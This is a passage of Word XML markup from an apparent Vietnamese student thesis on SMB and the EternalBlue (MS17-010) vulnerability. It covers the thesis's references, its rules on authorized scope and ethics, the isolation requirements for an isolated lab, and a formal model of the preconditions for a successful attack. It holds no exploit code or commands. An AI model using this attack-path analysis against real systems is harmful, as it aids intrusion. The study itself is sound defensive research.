          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> theo mô hình 3 bước, xác định các điều kiện tồn tại nguy cơ và đánh giá tác động an toàn thông tin theo tam giác CIA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930EA17" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Xác lập vai trò cụ thể của hệ điều hành Kali Linux, công cụ Nmap, Nmap Scripting Engine và Metasploit Framework trong các pha khảo sát, định danh và xác minh an ninh; đồng thời thiết lập bảng liên kết trực tiếp giữa các khái niệm lý thuyết với các bước quan sát và thao tác trong môi trường thực nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14916E0B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Xây dựng khung phân định 4 cấp độ trạng thái dịch vụ và lỗ hổng nhằm chuẩn hóa nhận định kỹ thuật, chỉ rõ các giới hạn gây kết quả sai lệch và hệ thống hóa 6 nguyên tắc phòng thủ cơ bản để giảm thiểu rủi ro cho dịch vụ SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A374EE0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Những nội dung lý thuyết, khung tiêu chí trạng thái và nguyên tắc phòng thủ được thiết lập trong chương này là cơ sở để tiến hành thiết kế mô hình mạng lab cô lập, cấu hình các máy trạm thực nghiệm và xây dựng kịch bản kiểm thử chi tiết trong Chương 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9A7AA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0701F8C2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] A. S. Tanenbaum, D. Wetherall, and N. Feamster, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Computer Networks</w:t>
      </w:r>
      <w:r>
        <w:t>, 6th ed. Boston, MA: Pearson, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B0CF57" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[2] Microsoft, "Direct hosting of SMB over TCP/IP," Microsoft Learn, 2023. [Online]. Available: https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/direct-hosting-of-smb-over-tcpip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F2488" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] P. Yosifovich, D. A. Solomon, and A. Ionescu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Windows Internals, Part 1: System architecture, processes, threads, memory management, and more</w:t>
      </w:r>
      <w:r>
        <w:t>, 7th ed. Redmond, WA: Microsoft Press, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF94CDA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4] A. Allievi, M. E. Russinovich, D. A. Solomon, and A. Ionescu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Windows Internals, Part 2</w:t>
      </w:r>
      <w:r>
        <w:t>, 7th ed. Redmond, WA: Microsoft Press, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1905F9B3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[5] Microsoft, "Microsoft Security Bulletin MS17-010 - Critical," Microsoft Learn / Security TechCenter, Mar. 2017. [Online]. Available: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15490BD7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[6] Microsoft, "Overview of file sharing using the SMB 3 protocol in Windows Server," Microsoft Learn, 2023. [Online]. Available: https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E57F958" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[7] Microsoft, "SMB security enhancements," Microsoft Learn, 2023. [Online]. Available: https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00056E54" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[8] Microsoft, "Detect, enable, and disable SMBv1, SMBv2, and SMBv3 in Windows," Microsoft Learn, 2025. [Online]. Available: https://learn.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B663952" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[9] C. McNab, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Network Security Assessment: Know Your Network</w:t>
      </w:r>
      <w:r>
        <w:t>, 3rd ed. Sebastopol, CA: O'Reilly Media, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1F075" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[10] Microsoft Security Response Center (MSRC), "Eternal Synergy Exploit Analysis," Microsoft, 2017. [Online]. Available: https://msrc.microsoft.com/blog/2017/05/eternal-synergy-exploit-analysis/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04628EE6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[11] National Institute of Standards and Technology (NIST), "CVE-2017-0144 Detail," National Vulnerability Database (NVD), Mar. 2017. [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2017-0144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410D197" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[12] Microsoft Threat Intelligence, "New ransomware, old techniques: Petya adds-worm capabilities," Microsoft Security Blog, Jun. 2017. [Online]. Available: </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.microsoft.com/en-us/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24456500" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[13] Rapid7, "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption," Rapid7 Exploit Database, 2017. [Online]. Available: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15406DFF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[14] Cybersecurity and Infrastructure Security Agency (CISA), "Alert (TA17-132A): Indicators Associated With WannaCry Ransomware," US-CERT, May 2017. [Online]. Available: https://www.cisa.gov/news-events/alerts/2017/05/12/indicators-associated-wannacry-ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C87D91" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[15] Microsoft Threat Intelligence, "WannaCrypt ransomware worm targets out-of-date systems," Microsoft Security Blog, May 2017. [Online]. Available: https://www.microsoft.com/en-us/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D860AC8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[16] G. Weidman, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Penetration Testing: A Hands-On Introduction to Hacking</w:t>
      </w:r>
      <w:r>
        <w:t>. San Francisco, CA: No Starch Press, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A584BBC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[17] G. Lyon, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Vulnerability Scanning</w:t>
      </w:r>
      <w:r>
        <w:t>. Sunnyvale, CA: Insecure.Com LLC, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685E4429" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>[18] P. Calderon and Nmap Project, "smb-vuln-ms17-010.nse Script Source Code," Nmap Project, 2017. [Online]. Available: https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369C312" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[19] D. Kennedy, J. O'Gorman, D. Kearns, and M. Aharoni, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Metasploit: The Penetration Tester's Guide</w:t>
      </w:r>
      <w:r>
        <w:t>, 2nd ed. San Francisco, CA: No Starch Press, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D4BC7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00DAA5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 2. THIẾT KẾ VÀ TRIỂN KHAI MÔ HÌNH THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD0E579" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi đã hệ thống hóa cơ sở lý thuyết về giao thức SMB, cơ chế lỗ hổng MS17-010 và các công cụ phục vụ kiểm thử ở Chương 1, Chương 2 thiết lập phương pháp luận và môi trường thực nghiệm có kiểm soát. Chương này từ bỏ cách tiếp cận khảo sát dạng hộp đen (Black-box) để chuyển dịch sang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mô hình nghiên cứu chuỗi nhân quả (Causal-Chain Research Model)</w:t>
      </w:r>
      <w:r>
        <w:t>. Toàn bộ kiến trúc mạng, máy trạng thái của đối tượng kiểm thử và các kỹ thuật đo lường được thiết kế nhằm xác định chính xác các tiền điều kiện kỹ thuật của đường tấn công, đo lường các điểm bẻ gãy phòng thủ (Defense Breakpoints) và kiểm chứng tính khả dụng của dịch vụ nghiệp vụ trong môi trường mạng phân đoạn doanh nghiệp mô phỏng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0044C5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.1. YÊU CẦU VÀ NGUYÊN TẮC THIẾT KẾ MÔ HÌNH THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B367A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.1.1. Nguyên tắc đạo đức nghề nghiệp và phạm vi kiểm thử được ủy quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A459201" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm thử an ninh mạng (Penetration Testing) là hoạt động đánh giá an toàn thông tin can thiệp trực tiếp vào bề mặt dịch vụ và cơ chế quản lý bộ nhớ của hệ thống. Do đó, việc thiết kế và vận hành mô hình thực nghiệm phải tuân thủ nghiêm ngặt các chuẩn mực đạo đức nghề nghiệp và ranh giới pháp lý xác định [1]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF063C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Giới hạn phạm vi ủy quyền (Scope of Authorization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679EE56A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mọi thao tác khảo sát, quét cổng, gửi bản tin thăm dò và xác minh an ninh chỉ được phép thực hiện trên các hệ thống máy ảo thuộc môi trường lab cô lập do nhóm nghiên cứu trực tiếp thiết lập, quản lý và sở hữu. Nghiêm cấm hoàn toàn việc hướng công cụ kiểm thử hoặc phát tán các gói tin thăm dò tới bất kỳ địa chỉ IP, dải mạng hoặc thiết bị nào nằm ngoài phạm vi phòng lab nội bộ của đề tài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D4077F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nguyên tắc không phá hoại và kiểm soát tác động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423073DF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Quá trình kiểm thử được thiết kế nhằm mục đích nhận diện và đánh giá rủi ro, không nhằm mục đích phá hoại tính sẵn sàng của hệ thống. Trong các pha kiểm thử có khả năng gây mất ổn định vùng nhớ nhân hệ điều hành, người kiểm thử phải áp dụng các tham số kiểm soát chặt chẽ, sử dụng payload an toàn và luôn có phương án phục hồi hệ thống tức thời [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9F898" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bảo mật dữ liệu thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022BD1A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình kỹ thuật, mã định danh hệ thống và dữ liệu phát sinh trong quá trình thực nghiệm phải được lưu trữ trong môi trường nội bộ an toàn, phục vụ thuần túy cho mục đích nghiên cứu học thuật của đồ án, không chia sẻ công khai các thành phần có thể bị lạm dụng để tấn công phá hoại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBD7F24" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.1.2. Yêu cầu về tính cô lập và kiểm soát rủi ro mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C342C0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do lỗ hổng MS17-010 (đặc biệt CVE-2017-0144) cho phép thực thi mã từ xa mức nhân và có khả năng tự động lan truyền dạng sâu (wormable), kiến trúc lab bắt buộc phải bảo đảm tính cô lập hoàn toàn [2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E47BD8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ngăn chặn rò rỉ lưu lượng (Traffic Containment):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mạng lab phải được ngắt kết nối hoàn toàn khỏi mạng cục bộ của cơ sở đào tạo và Internet công cộng. Các gói tin SMB (TCP 445 / 139) và bản tin khai thác không được phép định tuyến vượt ra ngoài thiết bị chuyển mạch ảo nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6FDAE0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Loại bỏ kết nối Internet thực:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Toàn bộ kết nối ngoại vi (nếu có) chỉ là mạng diện rộng mô phỏng (Simulated WAN) phục vụ kiểm thử định tuyến, không có kết nối vật lý hoặc logic ra Internet thật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C68D7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm soát gateway và DHCP:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Các máy trạm trong các phân vùng mạng chỉ trỏ Default Gateway về thiết bị tường lửa nội bộ (Firewall/UTM). Không sử dụng dịch vụ DHCP cấp phát tự động dùng chung với máy chủ vật lý nhằm tránh xung đột và kiểm soát chặt chẽ nguồn gốc lưu lượng mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BED30D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.1.3. Phương pháp luận nghiên cứu chuỗi nhân quả (Causal-Chain Methodology)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3767C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nghiên cứu từ bỏ cách tiếp cận đánh giá hộp đen vốn chỉ ghi nhận hiện tượng bề mặt ("khai thác thành công" hoặc "khai thác thất bại"). Thay vào đó, đường tấn công của CVE-2017-0144 / EternalBlue được mô hình hóa thành một chuỗi các tiền điều kiện logic có quan hệ nhân quả phụ thuộc tuần tự [1], [3]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD547F0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\text{Attack Path Success} \iff R \land S \land D \land V \land E \land (C \lor \neg \text{Reverse})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335BAAC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trong đó, các biến tiền điều kiện được định nghĩa hình thức:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F473553" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$R$ (Network Reachability):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khả năng tiếp cận mạng. Gói tin IP từ trạm kiểm thử có thể định tuyến qua các vùng mạng và xuyên qua chính sách lọc gói của Firewall để đến được cổng dịch vụ của máy mục tiêu (TCP 445 / 139).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D566A8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$S$ (Service Responsiveness):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trạng thái hoạt động của dịch vụ. Tiến trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đang lắng nghe và phản hồi hợp lệ các bản tin bắt tay ba bước TCP bằng gói tin mang cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SYN-ACK</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFE2AB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$D$ (Dialect Negotiation Compatibility):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tính tương thích về phương ngữ giao thức. Máy chủ chấp nhận thiết lập phiên truyền thông sử dụng phương ngữ SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT LM 0.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) trong gói tin phản hồi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_NEGOTIATE</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74379754" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
